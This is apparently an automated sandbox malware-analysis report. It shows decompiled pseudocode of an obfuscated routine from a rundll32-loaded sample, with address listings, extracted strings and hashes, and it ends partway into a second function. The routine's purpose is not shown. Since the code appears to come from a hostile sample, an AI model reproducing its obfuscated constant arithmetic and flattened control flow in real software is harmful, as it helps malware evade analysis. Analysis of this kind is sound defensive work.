                                                                                                                      				_v116 = _v116 + 0xac16;
                                                                                                                      				_v116 = _v116 ^ 0x0060ab55;
                                                                                                                      				_v28 = 0x8c1e54;
                                                                                                                      				_v28 = _v28 ^ 0x40badf76;
                                                                                                                      				_v28 = _v28 ^ 0x4036c022;
                                                                                                                      				_v296 = 0x412245;
                                                                                                                      				_v296 = _v296 / _t901;
                                                                                                                      				_v296 = _v296 + 0x2cd;
                                                                                                                      				_v296 = _v296 >> 0xf;
                                                                                                                      				_v296 = _v296 ^ 0x00000af3;
                                                                                                                      				_v296 = 0xa8f395;
                                                                                                                      				_t902 = 0x4e;
                                                                                                                      				_v296 = _v296 / _t902;
                                                                                                                      				_v296 = _v296 + 0x6ac4;
                                                                                                                      				_v296 = _v296 << 6;
                                                                                                                      				_v296 = _v296 ^ 0x00ac1221;
                                                                                                                      				_v296 = 0xd124a6;
                                                                                                                      				_t903 = 7;
                                                                                                                      				_v296 = _v296 / _t903;
                                                                                                                      				_v296 = _v296 ^ 0x9d1dae1f;
                                                                                                                      				_v296 = _v296 | 0xe011ad48;
                                                                                                                      				_v296 = _v296 ^ 0xfd13ad6e;
                                                                                                                      				_v296 = 0xfabeb9;
                                                                                                                      				_v296 = _v296 >> 3;
                                                                                                                      				_v296 = _v296 + 0xfffff1c8;
                                                                                                                      				_t904 = 0x7d;
                                                                                                                      				_v296 = _v296 / _t904;
                                                                                                                      				_v296 = _v296 ^ 0x000314ef;
                                                                                                                      				_v296 = 0x1fa60b;
                                                                                                                      				_v296 = _v296 * 0x75;
                                                                                                                      				_v296 = _v296 >> 0xd;
                                                                                                                      				_v296 = _v296 + 0x5a08;
                                                                                                                      				_v296 = _v296 ^ 0x000a0276;
                                                                                                                      				_v292 = 0xde324a;
                                                                                                                      				_v292 = _v292 ^ 0x385f234d;
                                                                                                                      				_v292 = _v292 ^ 0x83f834b0;
                                                                                                                      				_v292 = _v292 ^ 0xbb7de3fa;
                                                                                                                      				_v288 = 0x3fe2ee;
                                                                                                                      				_t208 =  &_v288; // 0x3fe2ee
                                                                                                                      				_t905 = 0x7a;
                                                                                                                      				_v288 =  *_t208 / _t905;
                                                                                                                      				_v288 = _v288 ^ 0x0006d348;
                                                                                                                      				_v288 = 0x668cef;
                                                                                                                      				_v288 = _v288 << 1;
                                                                                                                      				_v288 = _v288 ^ 0x00ccb692;
                                                                                                                      				_v296 = 0x30a71d;
                                                                                                                      				_t906 = 0x6a;
                                                                                                                      				_v296 = _v296 * 0x35;
                                                                                                                      				_v296 = _v296 + 0xfc26;
                                                                                                                      				_v296 = _v296 + 0xffffafb1;
                                                                                                                      				_v296 = _v296 ^ 0x0a154a10;
                                                                                                                      				_v292 = 0x29409b;
                                                                                                                      				_v292 = _v292 << 4;
                                                                                                                      				_v292 = _v292 + 0x774;
                                                                                                                      				_v292 = _v292 ^ 0x029bb852;
                                                                                                                      				_v292 = 0xc87f9a;
                                                                                                                      				_v292 = _v292 >> 8;
                                                                                                                      				_v292 = _v292 >> 0xe;
                                                                                                                      				_v292 = _v292 ^ 0x00086377;
                                                                                                                      				_v292 = 0x96b752;
                                                                                                                      				_v292 = _v292 + 0x721a;
                                                                                                                      				_v292 = _v292 * 0x33;
                                                                                                                      				_v292 = _v292 ^ 0x1e11edab;
                                                                                                                      				_v292 = 0x9caff;
                                                                                                                      				_v292 = _v292 | 0x3ce1fe14;
                                                                                                                      				_v292 = _v292 ^ 0x920c3820;
                                                                                                                      				_v292 = _v292 ^ 0xaeed4fa4;
                                                                                                                      				_v268 = 0x625e2a;
                                                                                                                      				_v268 = _v268 + 0xa90c;
                                                                                                                      				_v268 = _v268 << 5;
                                                                                                                      				_v268 = _v268 + 0xdce3;
                                                                                                                      				_v268 = _v268 ^ 0x0c65276a;
                                                                                                                      				_v276 = 0x811ec0;
                                                                                                                      				_v276 = _v276 << 6;
                                                                                                                      				_v276 = _v276 * 0x18;
                                                                                                                      				_v276 = _v276 | 0xc27c5ff7;
                                                                                                                      				_v276 = _v276 ^ 0xc6f6c0fc;
                                                                                                                      				_v80 = 0xbf5549;
                                                                                                                      				_v80 = _v80 + 0xd976;
                                                                                                                      				_v80 = _v80 ^ 0x00c51c7a;
                                                                                                                      				_v88 = 0xc74c4b;
                                                                                                                      				_v88 = _v88 << 0xf;
                                                                                                                      				_v88 = _v88 ^ 0xa6283482;
                                                                                                                      				_v164 = 0x7a7277;
                                                                                                                      				_t287 =  &_v164; // 0x7a7277
                                                                                                                      				_v164 =  *_t287 * 0x2a;
                                                                                                                      				_t289 =  &_v164; // 0x7a7277
                                                                                                                      				_v164 =  *_t289 * 0x14;
                                                                                                                      				_v164 = _v164 ^ 0x91c2b6e3;
                                                                                                                      				_v172 = 0x8c5cd0;
                                                                                                                      				_v172 = _v172 / _t906;
                                                                                                                      				_v172 = _v172 + 0xffffaf11;
                                                                                                                      				_v172 = _v172 ^ 0x0000520f;
                                                                                                                      				_v208 = 0x96f19c;
                                                                                                                      				_v208 = _v208 >> 0xf;
                                                                                                                      				_v208 = _v208 ^ 0xf87e01d8;
                                                                                                                      				_v208 = _v208 ^ 0xf879a426;
                                                                                                                      				_v64 = 0x5acacd;
                                                                                                                      				_v64 = _v64 << 5;
                                                                                                                      				_v64 = _v64 ^ 0x0b5bfe72;
                                                                                                                      				_v248 = 0xed9818;
                                                                                                                      				_v248 = _v248 + 0xffff852e;
                                                                                                                      				_v248 = _v248 + 0x2b61;
                                                                                                                      				_v248 = _v248 + 0xffff5032;
                                                                                                                      				_v248 = _v248 ^ 0x00eca9ae;
                                                                                                                      				_v196 = 0xd8fc83;
                                                                                                                      				_v196 = _v196 + 0xffffe6c0;
                                                                                                                      				_v196 = _v196 << 7;
                                                                                                                      				_v196 = _v196 ^ 0x6c795a10;
                                                                                                                      				_v104 = 0xa57136;
                                                                                                                      				_v104 = _v104 << 8;
                                                                                                                      				_v104 = _v104 ^ 0xa57ba4e8;
                                                                                                                      				_v112 = 0x619c13;
                                                                                                                      				_t907 = 0x35;
                                                                                                                      				_v112 = _v112 * 0x46;
                                                                                                                      				_v112 = _v112 ^ 0x1ab16c90;
                                                                                                                      				_v284 = 0x3b2abb;
                                                                                                                      				_v284 = _v284 * 0x43;
                                                                                                                      				_v284 = _v284 << 0x10;
                                                                                                                      				_v284 = _v284 << 3;
                                                                                                                      				_v284 = _v284 ^ 0x77883a24;
                                                                                                                      				_v204 = 0xef756c;
                                                                                                                      				_v204 = _v204 | 0xa0746111;
                                                                                                                      				_v204 = _v204 ^ 0x0b05d0bc;
                                                                                                                      				_v204 = _v204 ^ 0xabfd0224;
                                                                                                                      				_v144 = 0x44b7c0;
                                                                                                                      				_v144 = _v144 << 6;
                                                                                                                      				_v144 = _v144 + 0x629;
                                                                                                                      				_v144 = _v144 ^ 0x1122cbf1;
                                                                                                                      				_v228 = 0x31841a;
                                                                                                                      				_v228 = _v228 * 0x38;
                                                                                                                      				_v228 = _v228 ^ 0x4159fb72;
                                                                                                                      				_v228 = _v228 + 0x624a;
                                                                                                                      				_v228 = _v228 ^ 0x4b8ee7c8;
                                                                                                                      				_v232 = 0xc15230;
                                                                                                                      				_v232 = _v232 ^ 0x2fe872e1;
                                                                                                                      				_v232 = _v232 >> 0xe;
                                                                                                                      				_v232 = _v232 + 0xc85e;
                                                                                                                      				_v232 = _v232 ^ 0x00073260;
                                                                                                                      				_v200 = 0xd055c7;
                                                                                                                      				_v200 = _v200 << 0xe;
                                                                                                                      				_v200 = _v200 + 0x1578;
                                                                                                                      				_v200 = _v200 ^ 0x157facd3;
                                                                                                                      				_v132 = 0xe0a83f;
                                                                                                                      				_v132 = _v132 * 0x7b;
                                                                                                                      				_v132 = _v132 >> 0xd;
                                                                                                                      				_v132 = _v132 ^ 0x000704ed;
                                                                                                                      				_v240 = 0x8432d;
                                                                                                                      				_v240 = _v240 | 0xed632ad0;
                                                                                                                      				_v240 = _v240 ^ 0x6858c4b6;
                                                                                                                      				_v240 = _v240 + 0xfdcb;
                                                                                                                      				_v240 = _v240 ^ 0x85392506;
                                                                                                                      				_v192 = 0x8324f8;
                                                                                                                      				_v192 = _v192 * 0x5b;
                                                                                                                      				_v192 = _v192 * 0x35;
                                                                                                                      				_v192 = _v192 ^ 0xa6bebbcd;
                                                                                                                      				_v272 = 0x14de64;
                                                                                                                      				_v272 = _v272 | 0x750df782;
                                                                                                                      				_v272 = _v272 ^ 0x336a958a;
                                                                                                                      				_v272 = _v272 + 0xffff8f03;
                                                                                                                      				_v272 = _v272 ^ 0x467f1cdb;
                                                                                                                      				_v52 = 0x5532de;
                                                                                                                      				_v52 = _v52 >> 6;
                                                                                                                      				_v52 = _v52 ^ 0x00006622;
                                                                                                                      				_v160 = 0xce031d;
                                                                                                                      				_v160 = _v160 | 0xfbc8b092;
                                                                                                                      				_v160 = _v160 * 0x6d;
                                                                                                                      				_v160 = _v160 ^ 0x3708e9e0;
                                                                                                                      				_v36 = 0x5242dc;
                                                                                                                      				_v36 = _v36 >> 7;
                                                                                                                      				_v36 = _v36 ^ 0x000cba3f;
                                                                                                                      				_v92 = 0x339fd7;
                                                                                                                      				_v92 = _v92 + 0xa0d7;
                                                                                                                      				_v92 = _v92 ^ 0x00306e5b;
                                                                                                                      				_v128 = 0xd7d7e5;
                                                                                                                      				_v128 = _v128 * 0x70;
                                                                                                                      				_v128 = _v128 << 0xe;
                                                                                                                      				_v128 = _v128 ^ 0x9d0cda42;
                                                                                                                      				_v264 = 0x31382b;
                                                                                                                      				_v264 = _v264 / _t907;
                                                                                                                      				_t908 = 0x45;
                                                                                                                      				_v264 = _v264 * 0x6c;
                                                                                                                      				_v264 = _v264 * 0x28;
                                                                                                                      				_v264 = _v264 ^ 0x0fadceb8;
                                                                                                                      				_v184 = 0x6ad0e5;
                                                                                                                      				_v184 = _v184 / _t908;
                                                                                                                      				_t909 = 0x32;
                                                                                                                      				_v184 = _v184 * 0x5e;
                                                                                                                      				_v184 = _v184 ^ 0x009cabd8;
                                                                                                                      				_v84 = 0x5866f1;
                                                                                                                      				_v84 = _v84 / _t909;
                                                                                                                      				_v84 = _v84 ^ 0x000cf4a6;
                                                                                                                      				_v256 = 0xa194b;
                                                                                                                      				_v256 = _v256 ^ 0x94dec7ad;
                                                                                                                      				_t910 = 0x46;
                                                                                                                      				_v256 = _v256 / _t910;
                                                                                                                      				_v256 = _v256 >> 0x10;
                                                                                                                      				_v256 = _v256 ^ 0x000f9e72;
                                                                                                                      				_v76 = 0x8e9e60;
                                                                                                                      				_v76 = _v76 + 0xffff51c3;
                                                                                                                      				_v76 = _v76 ^ 0x0088247f;
                                                                                                                      				_v224 = 0x83ac61;
                                                                                                                      				_t911 = 0x3d;
                                                                                                                      				_v224 = _v224 * 0x1d;
                                                                                                                      				_v224 = _v224 << 0xc;
                                                                                                                      				_v224 = _v224 | 0x2dac99f4;
                                                                                                                      				_v224 = _v224 ^ 0xade893a0;
                                                                                                                      				_v32 = 0x13495a;
                                                                                                                      				_v32 = _v32 + 0x5cab;
                                                                                                                      				_v32 = _v32 ^ 0x001eeb0b;
                                                                                                                      				_v136 = 0x5c94f5;
                                                                                                                      				_v136 = _v136 + 0xffff9353;
                                                                                                                      				_v136 = _v136 * 0x44;
                                                                                                                      				_v136 = _v136 ^ 0x187702f3;
                                                                                                                      				_v176 = 0x8546fa;
                                                                                                                      				_v176 = _v176 ^ 0x1d3e4f45;
                                                                                                                      				_v176 = _v176 << 4;
                                                                                                                      				_v176 = _v176 ^ 0xdbb17ead;
                                                                                                                      				_v56 = 0x621504;
                                                                                                                      				_v56 = _v56 + 0x6ed1;
                                                                                                                      				_v56 = _v56 ^ 0x006a4e76;
                                                                                                                      				_v244 = 0x9c5408;
                                                                                                                      				_v244 = _v244 | 0xf9568eed;
                                                                                                                      				_v244 = _v244 + 0x5010;
                                                                                                                      				_v244 = _v244 / _t911;
                                                                                                                      				_v244 = _v244 ^ 0x041668c2;
                                                                                                                      				_v252 = 0xb42276;
                                                                                                                      				_v252 = _v252 + 0xa961;
                                                                                                                      				_v252 = _v252 + 0xdc70;
                                                                                                                      				_v252 = _v252 ^ 0x05685821;
                                                                                                                      				_v252 = _v252 ^ 0x05d7e4aa;
                                                                                                                      				_v260 = 0xd51767;
                                                                                                                      				_v260 = _v260 * 0x31;
                                                                                                                      				_v260 = _v260 << 0xc;
                                                                                                                      				_v260 = _v260 << 0xf;
                                                                                                                      				_v260 = _v260 ^ 0xb80dad1b;
                                                                                                                      				_v280 = 0xeb0bae;
                                                                                                                      				_v280 = _v280 | 0x0e7dba98;
                                                                                                                      				_v280 = _v280 << 6;
                                                                                                                      				_t912 = 0x26;
                                                                                                                      				_v280 = _v280 / _t912;
                                                                                                                      				_v280 = _v280 ^ 0x050e5033;
                                                                                                                      				_v188 = 0x4bf18;
                                                                                                                      				_v188 = _v188 * 0x2e;
                                                                                                                      				_v188 = _v188 | 0xf176dffe;
                                                                                                                      				_v188 = _v188 ^ 0xf1f57857;
                                                                                                                      				_v96 = 0x6c4fa9;
                                                                                                                      				_v96 = _v96 + 0x1fcf;
                                                                                                                      				_v96 = _v96 ^ 0x00693444;
                                                                                                                      				_v148 = 0xfd06aa;
                                                                                                                      				_v148 = _v148 >> 1;
                                                                                                                      				_v148 = _v148 << 0xc;
                                                                                                                      				_v148 = _v148 ^ 0xe83e1d17;
                                                                                                                      				_v156 = 0xd0b75a;
                                                                                                                      				_v156 = _v156 + 0xffff0c56;
                                                                                                                      				_v156 = _v156 * 0x3c;
                                                                                                                      				_v156 = _v156 ^ 0x30b9846f;
                                                                                                                      				_v288 = 0xd0c6e5;
                                                                                                                      				_v288 = _v288 >> 0xc;
                                                                                                                      				_v288 = _v288 ^ 0x0000ba9d;
                                                                                                                      				_v292 = 0x631535;
                                                                                                                      				_v292 = _v292 >> 8;
                                                                                                                      				_v292 = _v292 * 0x1e;
                                                                                                                      				_v292 = _v292 ^ 0x000d3f85;
                                                                                                                      				_v296 = 0x662a0d;
                                                                                                                      				_v296 = _v296 + 0x95ba;
                                                                                                                      				_v296 = _v296 >> 7;
                                                                                                                      				_v296 = _v296 ^ 0xe8c154cb;
                                                                                                                      				_v296 = _v296 ^ 0xe8c95b3b;
                                                                                                                      				_v140 = 0x555820;
                                                                                                                      				_v140 = _v140 << 4;
                                                                                                                      				_v140 = _v140 | 0xc7d2a78c;
                                                                                                                      				_v140 = _v140 ^ 0xc7df0fda;
                                                                                                                      				_t913 = _v20;
                                                                                                                      				_t921 = _v20;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					while(1) {
                                                                                                                      						_t784 = _v236;
                                                                                                                      						while(1) {
                                                                                                                      							L3:
                                                                                                                      							_t925 = _t914 - 0x83eeb0d;
                                                                                                                      							if(_t925 <= 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							__eflags = _t914 - 0x969dc48;
                                                                                                                      							if(_t914 == 0x969dc48) {
                                                                                                                      								E002D0411(_t784, _v148, _v156, _v288);
                                                                                                                      								_t914 = 0x7ec14ff;
                                                                                                                      								L40:
                                                                                                                      								_t829 = _a24;
                                                                                                                      								_t884 = 0x3d0a345;
                                                                                                                      								L41:
                                                                                                                      								__eflags = _t914 - 0xa326727;
                                                                                                                      								if(__eflags == 0) {
                                                                                                                      									L11:
                                                                                                                      									return _t827;
                                                                                                                      								}
                                                                                                                      								_t784 = _v236;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							__eflags = _t914 - 0x9d261fa;
                                                                                                                      							if(_t914 == 0x9d261fa) {
                                                                                                                      								_t833 =  *_t829;
                                                                                                                      								__eflags = _t833;
                                                                                                                      								if(_t833 == 0) {
                                                                                                                      									_t787 = 0;
                                                                                                                      									__eflags = 0;
                                                                                                                      								} else {
                                                                                                                      									_t787 = _a24[1];
                                                                                                                      								}
                                                                                                                      								E002CBD01(_v56, _t913, _t833, _v244, _v252, _t787, _v260, _a20);
                                                                                                                      								_t923 =  &(_t923[7]);
                                                                                                                      								asm("sbb esi, esi");
                                                                                                                      								_t914 = (_t914 & 0xf886a69e) + 0xe7d57af;
                                                                                                                      								L13:
                                                                                                                      								_t829 = _a24;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      							__eflags = _t914 - 0xd1f742e;
                                                                                                                      							if(_t914 == 0xd1f742e) {
                                                                                                                      								_push(_t829);
                                                                                                                      								_t791 = E002C90DB(_v72, _t829, _v268, _t829, _v276, _v80, _v88);
                                                                                                                      								_t921 = _t791;
                                                                                                                      								__eflags = _t791;
                                                                                                                      								_t914 =  !=  ? 0x266034b : 0xa326727;
                                                                                                                      								E002B68DE(_v164, _v172, _v208, _v64, 0);
                                                                                                                      								_t923 =  &(_t923[0xa]);
                                                                                                                      								goto L40;
                                                                                                                      							}
                                                                                                                      							__eflags = _t914 - 0xe7d57af;
                                                                                                                      							if(_t914 == 0xe7d57af) {
                                                                                                                      								_t703 =  &_v96; // 0x693444
                                                                                                                      								E002D0411(_t913, _v280, _v188,  *_t703);
                                                                                                                      								L33:
                                                                                                                      								_t914 = 0x969dc48;
                                                                                                                      								goto L13;
                                                                                                                      							}
                                                                                                                      							__eflags = _t914 - 0xef78d61;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								goto L41;
                                                                                                                      							}
                                                                                                                      							_t914 = 0xd1f742e;
                                                                                                                      						}
                                                                                                                      						if(_t925 == 0) {
                                                                                                                      							_t914 = 0xef78d61;
                                                                                                                      							goto L3;
                                                                                                                      						}
                                                                                                                      						if(_t914 == 0xb94cb2) {
                                                                                                                      							__eflags = E002D0867(_t913, _a28);
                                                                                                                      							_t914 = 0xe7d57af;
                                                                                                                      							_t797 = 1;
                                                                                                                      							_t827 =  !=  ? _t797 : _t827;
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						if(_t914 == 0x266034b) {
                                                                                                                      							_t695 =  &_v112; // 0x306e5b
                                                                                                                      							_t784 = E002C00A0(_t921, _t829, _t829, _v248, _v196, _t829, _v104, _a36,  *_t695, _v284, _v204, _v116, _v144, _a4);
                                                                                                                      							_t829 = _a24;
                                                                                                                      							_t923 =  &(_t923[0xd]);
                                                                                                                      							__eflags = _t784;
                                                                                                                      							_v236 = _t784;
                                                                                                                      							_t884 = 0x3d0a345;
                                                                                                                      							_t914 =  !=  ? 0x3d0a345 : 0x7ec14ff;
                                                                                                                      							goto L3;
                                                                                                                      						}
                                                                                                                      						if(_t914 == _t884) {
                                                                                                                      							__eflags =  *_t829;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_t841 = _v24;
                                                                                                                      							} else {
                                                                                                                      								_push(_v132);
                                                                                                                      								_push(_v200);
                                                                                                                      								_push(0x2b12fc);
                                                                                                                      								_t841 = E002BAB66(_v228, _v232, __eflags);
                                                                                                                      								_t923 =  &(_t923[3]);
                                                                                                                      								_v24 = _t841;
                                                                                                                      							}
                                                                                                                      							_t657 =  &_v100; // 0xe65150
                                                                                                                      							_t807 = _v40 | _v48 | _v60 | _v212 | _v124 | _v108 | _v216 | _v120 |  *_t657;
                                                                                                                      							_t919 = _v12 & 1;
                                                                                                                      							__eflags = _t919;
                                                                                                                      							if(_t919 != 0) {
                                                                                                                      								__eflags = _t807;
                                                                                                                      							}
                                                                                                                      							_push(_t841);
                                                                                                                      							_t808 = E002D0349(_t841, _v240, _v16, _t841, _t841, _v192, _v272, _t807, _v236, _t841, _v52, _v160);
                                                                                                                      							_t913 = _t808;
                                                                                                                      							E002BAE03(_v36, _v92, _v128, _v24);
                                                                                                                      							_t923 =  &(_t923[0xd]);
                                                                                                                      							__eflags = _t808;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								goto L33;
                                                                                                                      							} else {
                                                                                                                      								_v68 = 1;
                                                                                                                      								E002BB6D1(_v44, _v264, _v184, 4, _v84,  &_v68, _t913);
                                                                                                                      								_t923 =  &(_t923[5]);
                                                                                                                      								__eflags = _t919;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									E002B75A5(_t913, _v256, _v152, _v76, _v224,  &_v68,  &_v20);
                                                                                                                      									_t682 =  &_v68;
                                                                                                                      									 *_t682 = _v68 | _v28;
                                                                                                                      									__eflags =  *_t682;
                                                                                                                      									E002BB6D1(_v168, _v32, _v136, _v20, _v176,  &_v68, _t913);
                                                                                                                      									_t923 =  &(_t923[0xa]);
                                                                                                                      								}
                                                                                                                      								_t914 = 0x9d261fa;
                                                                                                                      								goto L13;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						if(_t914 == 0x703fe4d) {
                                                                                                                      							__eflags = E002B84B8(_t913, _v220, __eflags) - _v180;
                                                                                                                      							_t914 =  ==  ? 0xb94cb2 : 0xe7d57af;
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						if(_t914 != 0x7ec14ff) {
                                                                                                                      							goto L41;
                                                                                                                      						}
                                                                                                                      						E002D0411(_t921, _v292, _v296, _v140);
                                                                                                                      						goto L11;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x002c7e1f
                                                                                                                      0x002c7e2a
                                                                                                                      0x002c7e35
                                                                                                                      0x002c7e40
                                                                                                                      0x002c7e4b
                                                                                                                      0x002c7e56
                                                                                                                      0x002c7e61
                                                                                                                      0x002c7e76
                                                                                                                      0x002c7e79
                                                                                                                      0x002c7e80
                                                                                                                      0x002c7e8b
                                                                                                                      0x002c7e96
                                                                                                                      0x002c7ea1
                                                                                                                      0x002c7ea9
                                                                                                                      0x002c7eb4
                                                                                                                      0x002c7ebf
                                                                                                                      0x002c7eca
                                                                                                                      0x002c7ed5
                                                                                                                      0x002c7ee0
                                                                                                                      0x002c7eeb
                                                                                                                      0x002c7ef6
                                                                                                                      0x002c7f01
                                                                                                                      0x002c7f11
                                                                                                                      0x002c7f15
                                                                                                                      0x002c7f1d
                                                                                                                      0x002c7f22
                                                                                                                      0x002c7f2a
                                                                                                                      0x002c7f36
                                                                                                                      0x002c7f3b
                                                                                                                      0x002c7f41
                                                                                                                      0x002c7f49
                                                                                                                      0x002c7f4e
                                                                                                                      0x002c7f56
                                                                                                                      0x002c7f62
                                                                                                                      0x002c7f67
                                                                                                                      0x002c7f6d
                                                                                                                      0x002c7f75
                                                                                                                      0x002c7f7d
                                                                                                                      0x002c7f85
                                                                                                                      0x002c7f8d
                                                                                                                      0x002c7f92
                                                                                                                      0x002c7f9e
                                                                                                                      0x002c7fa1
                                                                                                                      0x002c7fa5
                                                                                                                      0x002c7fad
                                                                                                                      0x002c7fba
                                                                                                                      0x002c7fbe
                                                                                                                      0x002c7fc3
                                                                                                                      0x002c7fcb
                                                                                                                      0x002c7fd3
                                                                                                                      0x002c7fdb
                                                                                                                      0x002c7fe3
                                                                                                                      0x002c7feb
                                                                                                                      0x002c7ff3
                                                                                                                      0x002c7ffb
                                                                                                                      0x002c8003
                                                                                                                      0x002c8008
                                                                                                                      0x002c800e
                                                                                                                      0x002c8016
                                                                                                                      0x002c801e
                                                                                                                      0x002c8022
                                                                                                                      0x002c802a
                                                                                                                      0x002c8037
                                                                                                                      0x002c8038
                                                                                                                      0x002c803c
                                                                                                                      0x002c8044
                                                                                                                      0x002c804c
                                                                                                                      0x002c8054
                                                                                                                      0x002c805c
                                                                                                                      0x002c8061
                                                                                                                      0x002c8069
                                                                                                                      0x002c8071
                                                                                                                      0x002c8079
                                                                                                                      0x002c807e
                                                                                                                      0x002c8083
                                                                                                                      0x002c808b
                                                                                                                      0x002c8093
                                                                                                                      0x002c80a0
                                                                                                                      0x002c80a4
                                                                                                                      0x002c80ac
                                                                                                                      0x002c80b4
                                                                                                                      0x002c80bc
                                                                                                                      0x002c80c4
                                                                                                                      0x002c80cc
                                                                                                                      0x002c80d4
                                                                                                                      0x002c80dc
                                                                                                                      0x002c80e1
                                                                                                                      0x002c80e9
                                                                                                                      0x002c80f1
                                                                                                                      0x002c80f9
                                                                                                                      0x002c8103
                                                                                                                      0x002c8107
                                                                                                                      0x002c810f
                                                                                                                      0x002c8117
                                                                                                                      0x002c8122
                                                                                                                      0x002c812d
                                                                                                                      0x002c8138
                                                                                                                      0x002c8143
                                                                                                                      0x002c814b
                                                                                                                      0x002c8156
                                                                                                                      0x002c8161
                                                                                                                      0x002c8169
                                                                                                                      0x002c8170
                                                                                                                      0x002c8178
                                                                                                                      0x002c817f
                                                                                                                      0x002c818a
                                                                                                                      0x002c819e
                                                                                                                      0x002c81a5
                                                                                                                      0x002c81b0
                                                                                                                      0x002c81bb
                                                                                                                      0x002c81c3
                                                                                                                      0x002c81c8
                                                                                                                      0x002c81d0
                                                                                                                      0x002c81d8
                                                                                                                      0x002c81e3
                                                                                                                      0x002c81eb
                                                                                                                      0x002c81f6
                                                                                                                      0x002c81fe
                                                                                                                      0x002c8206
                                                                                                                      0x002c820e
                                                                                                                      0x002c8216
                                                                                                                      0x002c821e
                                                                                                                      0x002c8226
                                                                                                                      0x002c822e
                                                                                                                      0x002c8233
                                                                                                                      0x002c823b
                                                                                                                      0x002c8246
                                                                                                                      0x002c8250
                                                                                                                      0x002c825b
                                                                                                                      0x002c8270
                                                                                                                      0x002c8271
                                                                                                                      0x002c8278
                                                                                                                      0x002c8283
                                                                                                                      0x002c8290
                                                                                                                      0x002c8294
                                                                                                                      0x002c8299
                                                                                                                      0x002c829e
                                                                                                                      0x002c82a6
                                                                                                                      0x002c82ae
                                                                                                                      0x002c82b6
                                                                                                                      0x002c82be
                                                                                                                      0x002c82c6
                                                                                                                      0x002c82d1
                                                                                                                      0x002c82d9
                                                                                                                      0x002c82e4
                                                                                                                      0x002c82ef
                                                                                                                      0x002c82fc
                                                                                                                      0x002c8300
                                                                                                                      0x002c8308
                                                                                                                      0x002c8310
                                                                                                                      0x002c8318
                                                                                                                      0x002c8320
                                                                                                                      0x002c8328
                                                                                                                      0x002c832d
                                                                                                                      0x002c8335
                                                                                                                      0x002c833d
                                                                                                                      0x002c8345
                                                                                                                      0x002c834a
                                                                                                                      0x002c8352
                                                                                                                      0x002c835a
                                                                                                                      0x002c836d
                                                                                                                      0x002c8374
                                                                                                                      0x002c837c
                                                                                                                      0x002c8387
                                                                                                                      0x002c838f
                                                                                                                      0x002c8397
                                                                                                                      0x002c839f
                                                                                                                      0x002c83a7
                                                                                                                      0x002c83af
                                                                                                                      0x002c83bc
                                                                                                                      0x002c83c5
                                                                                                                      0x002c83c9
                                                                                                                      0x002c83d1
                                                                                                                      0x002c83d9
                                                                                                                      0x002c83e1
                                                                                                                      0x002c83e9
                                                                                                                      0x002c83f1
                                                                                                                      0x002c83f9
                                                                                                                      0x002c8404
                                                                                                                      0x002c840c
                                                                                                                      0x002c8417
                                                                                                                      0x002c8422
                                                                                                                      0x002c8435
                                                                                                                      0x002c843c
                                                                                                                      0x002c8447
                                                                                                                      0x002c8452
                                                                                                                      0x002c845a
                                                                                                                      0x002c8465
                                                                                                                      0x002c8470
                                                                                                                      0x002c847b
                                                                                                                      0x002c8486
                                                                                                                      0x002c8499
                                                                                                                      0x002c84a0
                                                                                                                      0x002c84a8
                                                                                                                      0x002c84b3
                                                                                                                      0x002c84c1
                                                                                                                      0x002c84ce
                                                                                                                      0x002c84d1
                                                                                                                      0x002c84da
                                                                                                                      0x002c84de
                                                                                                                      0x002c84e6
                                                                                                                      0x002c84fc
                                                                                                                      0x002c850b
                                                                                                                      0x002c850e
                                                                                                                      0x002c8515
                                                                                                                      0x002c8520
                                                                                                                      0x002c8536
                                                                                                                      0x002c853d
                                                                                                                      0x002c8548
                                                                                                                      0x002c8550
                                                                                                                      0x002c855c
                                                                                                                      0x002c8561
                                                                                                                      0x002c8567
                                                                                                                      0x002c856c
                                                                                                                      0x002c8574
                                                                                                                      0x002c857f
                                                                                                                      0x002c858a

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *f$ XU$"f$'g2$'g2$*^b$+81$D4iPQ$Jb$M#_8$PQ$[n0D4iPQ$a+$lu$pg[$vNj$wrz$r/$?n
                                                                                                                      • API String ID: 0-930466666
                                                                                                                      • Opcode ID: 7578c1811ae7440459a7f05150e4724001bf23e1b19645faff914bdb2f1ac3a8
                                                                                                                      • Instruction ID: 28f5d438a211ccf68fb73c292abe10b2b04ca165d15935289e9c899e90b2e614
                                                                                                                      • Opcode Fuzzy Hash: 7578c1811ae7440459a7f05150e4724001bf23e1b19645faff914bdb2f1ac3a8
                                                                                                                      • Instruction Fuzzy Hash: CC8200B15093818FD3B8CF25C54AB9BBBE1BBC4708F108A1DE1DA96260D7B18959CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E002BCFCE(intOrPtr __ecx) {
                                                                                                                      				char _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				char* _v48;
                                                                                                                      				intOrPtr _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				char _v68;
                                                                                                                      				intOrPtr _v72;
                                                                                                                      				char _v76;
                                                                                                                      				char _v80;
